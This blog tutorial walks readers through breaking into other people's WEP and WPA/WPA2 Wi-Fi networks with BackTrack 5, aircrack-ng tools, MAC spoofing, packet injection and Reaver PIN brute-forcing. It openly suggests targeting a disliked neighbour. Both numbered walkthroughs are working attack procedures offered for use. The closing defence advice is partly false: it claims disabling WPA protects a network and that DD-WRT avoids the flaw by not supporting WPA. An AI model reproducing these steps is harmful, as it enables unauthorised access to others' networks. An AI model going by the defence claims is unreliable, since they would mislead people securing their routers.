Tech tutorials, howtos and walkthroughs

I love the Internet and I especially love Google. Free knowledge to occupy the interstices of your free time either learning something new, watching and downloading Youtube Videos, Social Networking, designing Video Games or even making money as surmised in Digital JAM 2.0 introduces Freelancer.com and MobileWorks to Jamaica as the GOJ readies Flexi-work Legislation. And I have even more reasons to love it, as my little community of Milk River has finally been updated to the status of a place that has access to this vital Telecom Service.

Digicel has now made their WiMaX Services, commercial known as Digicel Broadband Internet, available in Milk River. That means in a few months time, those people who brought a Digicel CPE (Customer Premises Equipment) will eventually be creating a lot of Free Wi-Fi Hot spots all around Milk River, enabling those with Mobile phones within 100 meters of your house to get essentially free Internet.

Passwords are sure to go up as quickly as a neighbor can erect a mesh wire goat-proof fence, however, once the Network hogs in the community with their laptops sent down during the Christmas period begin to take advantage of the freeness. They’ll start to block their Wi-Fi Networks with stronger passwords to complement the WEP (Wired Equivalent Privacy) or stronger WPA (Wi-Fi Protected Access) or WPA2 Encryption on their personal Home Wi-Fi Networks powered by either the Digicel CPE a separate Router connected to the Digicel CPE.

These Encryption schemas, are really more like zinc fences in Tivoli Garden and fall just as easily, once you’ve spent your time online wisely learning on Youtube Videos and Blogs that detail the process and less of it on Social Networks. Since this is not a tutorial on Data Encryption Schemas, I’ll not get into the technicalities, merely pausing to say WPA is more secure than WEP, but both are still hackable with only one Defense against the Dark Arts, as you’ll see below as you read.

wifi-logo

So how does one access a WEP, WPA or WPA2 Wi-Fi Network that has a password? Folks, you know how what time it is. It’s DIY (Do it Yourself) time as I distill the knowledge of the ‘Net (mainly YouTube) into one easy-to-read-and-follow Sunday Morning Project.

First you’ll need to get the following tools:

  • USB Wi-Fi Adapter capable of packet injection (ask the store tech!). The Alfa AWUS050NH USB Wi-Fi Adapter is best; buy it on Amazon.com with your Scotia VISA Debit Card. It’s for science
  • Notepad and a Pen. Yes, you’ll have to take notes
  • Desktop Computer with a CD-DVD Drive with at least 2GB RAM and 320GB Hard-Drive
  • BackTrack 5 Live CD with Reaver Software (downloaded while you hack)
  • Your own WEP or WPA/WPA2-enabled Wi-Fi Network. That’s for the Reaver Update as well as a for a crash test dummy, in case you’re not up to hacking your neighbour’s Wi-Fi Network
  • Target WEP or WPA/WPA2-enabled Wi-Fi Network. The signal should be strong with people connected and actively using the Wi-Fi Network, which increases the chances of accessing the Network. Also preferably a neighbor you don’t like

Patience like Job in the Old Testament section of the Bible. Most of the Steps below involve Command Line and take hours to execute. As such, your typing skills will be put to their ultimate test

If you read my article on booting a computer using a Linux Distribution from your CD-DVD Drive as described in How to boot or install Fedora Linux on your laptop or computer from a Thumb Drive, then this should be a piece of cake for you.

Now dear reader, flex your fingers, as it’s on to the fun stuff. Get ready to follow the White Rabbit to hack the WEP Wi-Fi Network:

  1. Install and connect your USB Wi-Fi Adapter
  2. Burn a bootable ISO of BackTrack 5 Live CD to a CD
  3. Boot the computer/Laptop using the bootable BackTrack 5 Live
  4. Select “BackTrack Text – Default Boot Text Mode” during boot and press Enter. This takes you to a Command Line Interface
  5. Type the command startx and press Enter. This will take you to BackTrack 5 Live GUI (Graphic User Interface)
  6. Make sure your Wi-Fi Adaptor can pick up your target Wi-Fi Network with at least three bars of solid signal
  7. Launch Konsole, BackTrack’s built-in command line located on the Taskbar in the lower left corner; it looks like a little black window in the Taskbar
  8. Type the command airmon-ng; this produces the Network Interface name of the Wi-Fi Adaptor
  9. Write down the Network Interface Name(s) that appears after running the command e.g. wh1.
  10. Use that Network Interface Name in the following commands, replacing the word <White Rabbit>.
  11. Type the command airmon-ng stop <White Rabbit>
  12. Type the command  ifconfig <White Rabbit> down
  13. Type the command macchanger –mac 00:11:22:33:44:55 <White Rabbit>
  14. Type the command airmon-ng start <White Rabbit>
  15. The above four (4) commands created a fake MAC Address. Pray that it works (Fingers crossed, clutching crucifix and rosary…)
  16. Type the command airodump-ng <White Rabbit> to see a list of available Wireless Networks.
  17. When you see the name of the one you want, press Ctrl+C to stop the list
  18. Write down or copy to notepad on your computer the BSSID and its Channel in the column labeled CH. Take care to see that the Network chosen has WEP encryption  as listed in the column labeled ENC
  19. Type the command airodump-ng -c [channel] -w [filename] –bssid [bssid] <White Rabbit>. Where you see [channel] and [bssid] copy the info recorded above. This command saves the ESSID Data to C: hard drive named [filename], which should be a simple filename chosen by you
  20. Open a Second Konsole window in the foreground
  21. Type the Command aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] <White Rabbit>. The ESSID is stored in the [filename] and is effectively the [filename] used in that spot in the command.
  22. Once you see the message “Association successful” with a smiley face, you’re good for the next command (Thumbs up sign!)
  23. Type the command aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 <White Rabbit>. This instructs your USB Wi-Fi Router to inject packets into the Network, which may result in speed slowing down on the user’s Network.
  24. Watch the #Data Column until it goes over 10,000. A walk or a nap for at least two (2) to ten (10) hours would be good right about now to stretch your legs and shake off the jitters
  25. Open a Third Konsole window in the foreground
  26. Type the Command aircrack-ng -b [bssid] [filename]-01.cap. This dumps the data to a new file named [filename]-01.cap and attempts to extract the password from the data dumped
  27. If successful in the key extraction, the WEP key appears next to “KEY FOUND:”  on the Third Konsole window
  28. Write down or copy to notepad on your computer and enter it to log onto the Network. Most likely at this point, you would have shut down backtrack and booted back into Windows if the Linux Environment is not to your liking
  29. Congratulations. You’ve just hacked a WEP Wi-Fi Network
more on Geezam.com:  Samsung receives EPA Award for Galaxy S10 packaging and e-waste recycling

Had fun? Now let’s take Backtrack 5 Live and follow the White Rabbit to hack the WPA or a WPA2 Wi-Fi Network:

  1. Install and connect your USB Wi-Fi Adapter
  2. Burn a bootable ISO of BackTrack 5 Live CD to a CD
  3. Boot the computer/Laptop using the bootable BackTrack 5 Live
  4. Select “BackTrack Text – Default Boot Text Mode” during boot and press Enter. This takes you to a Command Line Interface
  5. Type the command startx and press Enter. This will take you to BackTrack 5 Live GUI (Graphic User Interface)
  6. Make sure your Wi-Fi adaptor can pick up your target Wi-Fi Network with at least three bars of solid signal
  7. At this point, you’ll need to have access to a Wi-Fi Network for which you have a password. This is to install Reaver, the software that will do most of the work to crack the WPA or WPA2 Wi-Fi Network
  8. Click Applications > Internet > Wicd Network Manager
  9. Select your Network and click Connect, entering password if necessary
  10. Click OK and then click Connect
  11. Click the Terminal Button in the menu bar or click Applications > Accessories > Terminal
  12. Type the Command apt-get update to Download the Reaver Update
  13. Type the Command apt-get install reaver to install after Reaver is downloaded
  14. Click Applications > Internet > Wicd Network Manager
  15. Click Disconnect. We’re now free of the Known Wi-Fi Network; time to hack the Target WPA or WPA2 Wi-Fi Network
  16. Type the Command iwconfig to get the Wi-Fi Adaptors Network Interface Name. Again, let’s call it <White Rabbit>
  17. Write down the Network Interface Name(s) that appears after running the command e.g. wh1.
  18. Use that Network Interface Name in the following commands, replacing the word <White Rabbit>.
  19. Type the Command airmon-ng start <White Rabbit>
  20. Type the Command airodump-ng <White Rabbit> to find the BSSID of the target WPA or WPA2 Wi-Fi Network you want to crack
  21. If the above command does not work, Type the Command airodump-ng mon0 to monitor the available WPA or WPA2 Wi-Fi Networks in the area a print a list to your screen
  22. When you see the name of the one you want, press Ctrl+C to stop the list
  23. Write down or copy to notepad on your computer the BSSID and its Moninterface. Take care to see that the Network chosen has WPA or WPA2 encryption  as listed in the column labeled ENC
  24. Type the Command reaver -i [moninterface] -b [bssid] -vv, taking care to copy the BSSID and its associated Moninterface in the spots in the command labeled [bssid] and [moninterface] respectively
  25. Reaver will now brute force a series of PINs via Packet Injection to access the WPA or WPA2 Wi-Fi Networks. A walk or a nap for at least two (2) to ten (10) hours would be good right about now to stretch your legs and shake off the jitters
  26. After two (2) to ten (10) hours, according to Reaver’s documentation you should see “WPA PSK:” and the password for the WPA/WPA2 Network
  27. Write down or copy to notepad on your computer and enter it to log onto the Network. Most likely at this point, Congratulations. You’ve just hacked a WPA or WPA2 Wi-Fi Network
more on Geezam.com:  Reflections on Galaxy Z Flip3 Bespoke Edition and Galaxy Watch4 Bespoke Edition

Based on my own research and reading online, it appears there is no know Defense Against the Dark Arts for the above WEP, WPA or WPA2 Wi-Fi Network Hack.

Here again a list helps:

  • Disabling WPA, the basis of the above hacks. However, most Wi-Fi Routers, such as those used by FLOW, do not make it possible or easy to manually disable WPA. True too for most Wi-Fi Network Routers.
  • MAC Address Filtering using a Whitelist of approved MAC Addresses. Unfortunately this can be easily defeated by an experienced hacker getting the MAC Address of the target Computer of the Network connected to the Wi-Fi Router via various means and then spoofing that MAC Address.

The only thing that works, ironically, is upgrading your Wi-Fi Router to Open Source (woot woot!) Wi-Fi Router firmware DD-WRT. This as DD-WRT does not support the IEEE standard WPA as it’s Open Source Firmware and maintained by the Open Source Community worried about the very same vulnerability in Wi-Fi Networks.

However, before you go and update your Wi-Fi Router’s Firmware with DD-WRT, you’ll have to check i.e. Google, to see if your Wi-Fi Router supports what is currently the only Defense against the Dark Arts when it comes to Wi-Fi Network Hacking.

Finally too, there’s also just simply using Social Engineering Methods. Here are a few, courtesy of the White Rabbit:

  • Setting up a Website Whitelist Filter using Freeware K9 Web Protect Website Filter. Hackers usually like to use other Wi-Fi Networks to download movies and large content. K9 Web Protect will create a list of Website that are not only safe for the family, but prevent access by hackers once they hack your Wi-Fi Network.
  • Monitor your Wi-Fi Networks Traffic using Networx, a freeware Network Monitor.  Networx can be set to track your Internet usage and alert you of suspicious traffic on your Wi-Fi Network.
  • Change the password once each week, frustrating the Hacker, who spent hours hacking you the first time and now has to site through another 2 to 10  and now has to move on to another victim.

That’s it folks. Remember Knowledge is Power. Use it wisely…..

Here’s the links:

BackTrack 5 Live CD

http://www.backtrack-linux.org/downloads/

Networx 5.2.5

http://www.softpedia.com/get/Network-Tools/Bandwidth-Tools/Networx.shtml

K9 Web Protect

http://www1.k9webprotection.com/

DD-WRT Firmware

http://dd-wrt.com/

 

 

About the Author

Read more on Geezam.com